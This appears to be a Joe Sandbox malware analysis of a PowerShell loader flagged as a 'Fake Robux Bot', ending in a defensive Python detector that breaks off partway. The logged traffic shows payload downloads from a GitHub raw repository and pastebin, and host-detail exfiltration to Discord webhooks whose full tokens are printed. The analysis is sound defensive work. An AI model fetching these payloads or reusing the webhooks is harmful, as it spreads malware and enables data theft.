Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbix source: powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbo source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb% source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic; Suricata IDS: 2857658 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Registration : 192.168.2.7:49775 -> 162.159.138.232:443
Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49889 -> 162.159.138.232:443
Source: Network traffic; Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.7:49852 -> 162.159.138.232:443
Source: unknown; DNS query: name: pastebin.com
Source: Joe Sandbox View; IP Address: 104.20.3.235
Source: Joe Sandbox View; IP Address: 162.159.138.232
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 185.199.109.133:443
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 215 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 300 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 300 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 215 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 16:08:27 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729008509 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imyMIeHTEUKrovK9QjsYTPhziEcFHvbCRUmlHJ04Sdmlni2azLULDXKhTQkqtByBt2d%2BDgG9HPAIrcuLyL3JBGB3bLQkl2IhNuZitGsHxCfOPpeMjmsew252GVSl"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=79c012eaf9029fed6f4174fc912d62fc9df2f131-1729008507; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=NRZYuviVxKznP8b._.zmL4nobhKDT8sSIL_kl3WgFCM-1729008507935-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d311165fb836c3d-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 16:08:41 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729008523 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCDeVYfG8MOB0FTSV0UaeFLhjp7PDyjKfLCFzNYSi2LWR1vejx2IA%2FAKTlNsTQA%2BFioU%2FubTwFF92vNbWie4qWxEDWEb3XGiD%2B7wz99RzoTzgAB%2FBWI1Mjq0sZc5"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=bd1d45b24ccd9896b6e9876f8b878c373fe51f19-1729008521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=XJWZftbrpRr34.ddkGfOILwNBMWYYtEwVHX6y4K6hok-1729008521994-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3111bddf3ea915-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 16:08:49 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729008530 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmW9a6ZzW6OZtWv4mx158Rhhm7zAR9pDtYeqopVf8louXs4yLTmZHQ3cLwwS7oNaoxDob4YR9htr06zB%2FyJ9p2MobYR1zHRVImJaIGYUR%2FPWoxMFRUpeN1GBuLjA"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=0968388ccef6ec26a57a8a0fca07deaa13e0c211-1729008529; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=Zg1_cvnTkrEezowrmdGcWuRIEpyS1qc_JH3ww76STdM-1729008529315-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3111eb984d6be9-DFW
Source: powershell.exe, 00000011.00000002.1846302686.0000024098480000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftp
Source: svchost.exe, 00000007.00000002.2554051222.000001F0D2E0F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1510210225.0000026C9313B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080373000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408034C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080339000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpT
Source: powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/129575196622756
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGM
Source: powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewv
Source: edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000007.00000003.1367837796.000001F0D2BE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.7.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll
Source: powershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dll
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Photoshop_Set-Up.exe
Source: powershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1 | String found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown | Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49852 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49889 version: TLS 1.2
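The request lines above are the whole loader loop seen from the wire: PowerShell's default Invoke-WebRequest User-Agent (WindowsPowerShell/5.1.19041.1682) pulls Backend.dll and FH5.exe from a GitHub raw URL, fetches a script body from pastebin.com/raw/sA04Mwk2, keeps polling gaber.txt, and POSTs JSON to two Discord webhooks (both of which answered 404, so the beacons did not land during this run). None of these hosts is an indicator on its own; the combination of client and path is. The following Python is an added example, not part of the Joe Sandbox report: it parses request heads the way a proxy or sandbox records them and flags that combination. The sample requests are rebuilt from the lines above (headers only, no bodies), the benign Chrome request at the end is constructed to show the host alone does not fire, and the tag names and the "PowerShell plus one pattern" rule are the example's own.

```python
import re

# Constructed sample: the request heads from this report rebuilt as on-the-wire
# HTTP/1.1 (CRLF-separated, bodies omitted), plus one benign browser request
# that is NOT in the report, added to show the host alone does not fire.
UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
REPO = "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/"
SAMPLE_REQUESTS = [
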